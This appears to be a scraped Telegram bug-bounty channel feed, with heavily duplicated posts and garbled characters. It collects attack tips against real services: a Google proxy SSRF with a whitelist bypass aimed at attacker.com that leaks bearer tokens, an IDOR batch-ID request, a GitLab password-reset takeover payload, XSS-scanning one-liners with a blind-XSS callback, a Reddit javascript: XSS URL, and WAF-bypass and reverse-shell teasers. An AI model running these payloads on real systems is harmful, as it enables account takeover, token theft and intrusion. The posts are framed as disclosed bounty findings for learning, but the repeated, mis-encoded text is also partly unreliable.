Hey Hunters,
DarkShadow hereโback again with a very interesting Google SSRF Proof of Concept!
๐ง Fixing the Unfixable: A Google Cloud SSRF Tale
A critical Server-Side Request Forgery (SSRF) vulnerability was discovered in Google's cxl-services.appspot.com proxy, which powers interactive demos for various Google Cloud products, including jobs.googleapis.com.
๐ Discovery
While exploring the Cloud Talent Solution API (jobs.googleapis.com), it was noticed that demo requests were routed through:
cxl-services.appspot.com/proxy?url=
Hereโs a sample request:
The response returned 200 OK and displayed the full content, meaning the SSRF was not blind โ and that makes it critical.
๐งฑ Initial Test: Traditional SSRF Blocked
Trying to change the url parameter to a malicious domain:
Response:
403 Forbidden
Invalid Target Host - Please add to allow list
This indicated the presence of a backend whitelist restricting outbound requests.
๐ก๏ธ Whitelist Bypass Trick
Despite the whitelist, a clever bypass was possible by exploiting discrepancies between URL parsers (RFC3986 vs. WHATWG) using a backslash (\) and @ symbol:
This tricked the proxy into making the request to attacker.com, while treating the domain as jobs.googleapis.com.
๐ Sensitive Token Leakage
Even worse: the proxy included an Authorization: Bearer <token> header in its outbound requests.
By redirecting traffic to a controlled server, the researcher was able to capture tokens granting access to internal Google Cloud projects such as:
He even deployed a custom App Engine service within cxl-services, proving full code execution capabilities.
๐ฐ Bounty Rewards
For these critical findings, the researcher earned over $13,000 from Googleโs Vulnerability Reward Program (VRP).
Credit: Discovered by David Schรผtz
But Hunters, donโt forget to follow me for more deep-dive writeups and live exploitation breakdowns!
Follow me in X ๐๐ผ DarkShadow
#bugbountytips #googlebug #ssrf
DarkShadow hereโback again with a very interesting Google SSRF Proof of Concept!
๐ง Fixing the Unfixable: A Google Cloud SSRF Tale
A critical Server-Side Request Forgery (SSRF) vulnerability was discovered in Google's cxl-services.appspot.com proxy, which powers interactive demos for various Google Cloud products, including jobs.googleapis.com.
๐ Discovery
While exploring the Cloud Talent Solution API (jobs.googleapis.com), it was noticed that demo requests were routed through:
cxl-services.appspot.com/proxy?url=
Hereโs a sample request:
GET /proxy?url=https://jobs.googleapis.com/v4/projects/4808913407/tenants/ff8c4578-8000-0000-0000-00011ea231ff/jobs:search HTTP/1.1
Host: cxl-services.appspot.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Content-Type: application/json; charset=utf-8
Content-Length: 102
Connection: close
{"jobQuery":{"query":"bartendar","queryLanguageCode":"en"},"jobView":"JOB_VIEW_SMALL","maxPageSize":5}
The response returned 200 OK and displayed the full content, meaning the SSRF was not blind โ and that makes it critical.
๐งฑ Initial Test: Traditional SSRF Blocked
Trying to change the url parameter to a malicious domain:
GET /proxy?url=https://attacker_server.com HTTP/1.1
Host: cxl-services.appspot.com
Response:
403 Forbidden
Invalid Target Host - Please add to allow list
This indicated the presence of a backend whitelist restricting outbound requests.
๐ก๏ธ Whitelist Bypass Trick
Despite the whitelist, a clever bypass was possible by exploiting discrepancies between URL parsers (RFC3986 vs. WHATWG) using a backslash (\) and @ symbol:
GET /proxy?url=https://attacker.com\@jobs.googleapis.com/ HTTP/1.1
Host: cxl-services.appspot.com
This tricked the proxy into making the request to attacker.com, while treating the domain as jobs.googleapis.com.
๐ Sensitive Token Leakage
Even worse: the proxy included an Authorization: Bearer <token> header in its outbound requests.
By redirecting traffic to a controlled server, the researcher was able to capture tokens granting access to internal Google Cloud projects such as:
docai-demo
cxl-services
garage-staging
p-jobs
He even deployed a custom App Engine service within cxl-services, proving full code execution capabilities.
๐ฐ Bounty Rewards
For these critical findings, the researcher earned over $13,000 from Googleโs Vulnerability Reward Program (VRP).
Credit: Discovered by David Schรผtz
But Hunters, donโt forget to follow me for more deep-dive writeups and live exploitation breakdowns!
Follow me in X ๐๐ผ DarkShadow
#bugbountytips #googlebug #ssrf
๐ฅ15๐8๐ฟ2โค1๐ฑ1
Guys, I just bypassed a seriously tough WAF + IDS combo!
Let me give you a quick summary of the bypass journey:
While testing a WordPress setup, I noticed that it blocks any attempt to save PHP code using the standard <?php ?> tags โ access denied right away.
So, I tried using the shorthand <?= ?>, and surprisinglyโฆ it got through!
However, the IDS was still smart enough to detect and block any dangerous functions โ even if they were Base64 encoded.
I experimented with multiple obfuscation methods, but none of them workedโฆ until I had a breakthrough!
๐The trick? I used hex2bin() in combination with eval() โ and that finally bypassed both the WAF and IDS.๐ฅ
Want the payload/code? Let me know โ
And don't forget to follow me ๐๐ผ DarkShadow
#wafbypass
Let me give you a quick summary of the bypass journey:
While testing a WordPress setup, I noticed that it blocks any attempt to save PHP code using the standard <?php ?> tags โ access denied right away.
So, I tried using the shorthand <?= ?>, and surprisinglyโฆ it got through!
However, the IDS was still smart enough to detect and block any dangerous functions โ even if they were Base64 encoded.
I experimented with multiple obfuscation methods, but none of them workedโฆ until I had a breakthrough!
๐The trick? I used hex2bin() in combination with eval() โ and that finally bypassed both the WAF and IDS.๐ฅ
Want the payload/code? Let me know โ
And don't forget to follow me ๐๐ผ DarkShadow
#wafbypass
๐ซก35๐ฅ8๐7โค4
Perfect for anyone involved in:
Brut SecurityTake advantage of this opportunity and explore ZoomEyeโs premium features!
#BrutSecurity #ZoomEye
Please open Telegram to view this post
VIEW IN TELEGRAM
2โค14๐ฅ4๐3
Hey, donโt forget to like and share! And if you give it a try, tell us โ weโd love to know how youโre using it!
โค12๐7
๐ก IDOR Bypass Bug Bounty Tip
Sometimes APIs behave unexpectedly when multiple IDs are passed together.
๐ Scenario
โข Victimโs ID: 5200
โข Attackerโs ID: 5233
๐ซ GET /api/users/5200/info โ Access Denied
โ GET /api/users/5200,5233/info โ Bypass Successful
๐ Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!
#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
Sometimes APIs behave unexpectedly when multiple IDs are passed together.
๐ Scenario
โข Victimโs ID: 5200
โข Attackerโs ID: 5233
๐ซ GET /api/users/5200/info โ Access Denied
โ GET /api/users/5200,5233/info โ Bypass Successful
๐ Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!
#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
๐ฅ28๐12โค10๐2
Please open Telegram to view this post
VIEW IN TELEGRAM
๐11โค5๐ฅ1
Brut Security
Password Reset Bypass Trick ๐ Some poorly secured endpoints accept multiple email parameters.๐ณ Try this: POST /passwordReset HTTP/1.1 Content-Type: application/x-www-form-urlencoded [email protected]&[email protected] Or in JSON: {โฆ
Hey Hunters,
DarkShadow is back again with another POC that earned $35,000 ๐๐ผ
๐ฅ GitLab Password Reset via Account Takeover Vulnerability ๐ฌ
This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email ๐คฏ
โ POC Request:
I was shared this same method a long time ago ๐
Don't forget to follow me ๐๐ผ DarkShadow
DarkShadow is back again with another POC that earned $35,000 ๐๐ผ
๐ฅ GitLab Password Reset via Account Takeover Vulnerability ๐ฌ
This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email ๐คฏ
โ POC Request:
"user": {
"email": [
"[email protected]",
"[email protected]"
]
}
I was shared this same method a long time ago ๐
Don't forget to follow me ๐๐ผ DarkShadow
๐ฟ16๐ฅ11โค6๐6๐ฑ3
Hey Hunters,
DarkShadow hereโback again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shellโno more manual payload hunting!
Let me know if you need๐
DarkShadow hereโback again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shellโno more manual payload hunting!
Let me know if you need๐
๐ฅ19๐7๐ณ2
More tools, tips, and hacking content coming your way!
Stay connected with us โ the journey has just begun.
Donโt forget to like and share!
Please open Telegram to view this post
VIEW IN TELEGRAM
2๐25โค11๐ฅ4
Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commands๐
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
2. Gospider + Dalfox
4. Gospider + Dalfox (Deep Crawl)
Required tools are:
If you find this helpful and want more cutting-edge tips and tricks, donโt forget to follow me ๐๐ผ DarkShadow
#bugbountytips #xss
DarkShadow here back again, dropping some one-liner killer XSS commands๐
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done
2. Gospider + Dalfox
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe3. Wayback + GF + Blind XSS via Dalfox
waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe
4. Gospider + Dalfox (Deep Crawl)
gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt5. Dalfox Direct with Blind XSS
cat urls.txt | dalfox pipe -b yourdomain.xss
Required tools are:
httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox
If you find this helpful and want more cutting-edge tips and tricks, donโt forget to follow me ๐๐ผ DarkShadow
#bugbountytips #xss
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
๐ฅ~For more Join my New telegram Channel๐๐ผ https://t.co/9p1yvzluA4 โจ
๐ฅ~For more Join my New telegram Channel๐๐ผ https://t.co/9p1yvzluA4 โจ
๐ฅ13๐7๐5๐จโ๐ป3
Good morning hacker's,
Let's start morning to hack Reddit account ๐
Let's start morning to hack Reddit account ๐
๐11๐ซก2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Letโs break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But hereโs the twist...
โ PoC Steps (Super Simple):
Boom๐ฅ. Thatโs it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation โ just a mindset shift.
keep your payloads sharp and your eyes sharper.
Donโt forget to react, share, and follow me in X
๐๐ผ DarkShadow
#bugbountytips #xss
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Letโs break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But hereโs the twist...
โ PoC Steps (Super Simple):
https://www.reddit.com/login/?dest=javascript:alert(document.domain)
Boom๐ฅ. Thatโs it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation โ just a mindset shift.
keep your payloads sharp and your eyes sharper.
Donโt forget to react, share, and follow me in X
๐๐ผ DarkShadow
#bugbountytips #xss
๐18๐10๐ฅ7๐ฟ4โค2
Who are you in the world of cybersecurity?
Anonymous Poll
42%
Beginner โ currently learning cybersecurity ๐
25%
Bug bounty hunter โ actually reporting vulnerabilities ๐ฅ
7%
Red teamer โ simulating real-world attacks to improve defenses ๐ฅ
15%
Professional Pentester โ Working in a cybersecurity job role โจ
11%
Black hat hacker โ unauthorized hacking โ ๏ธ
๐ฅ11๐ณ8โค1๐1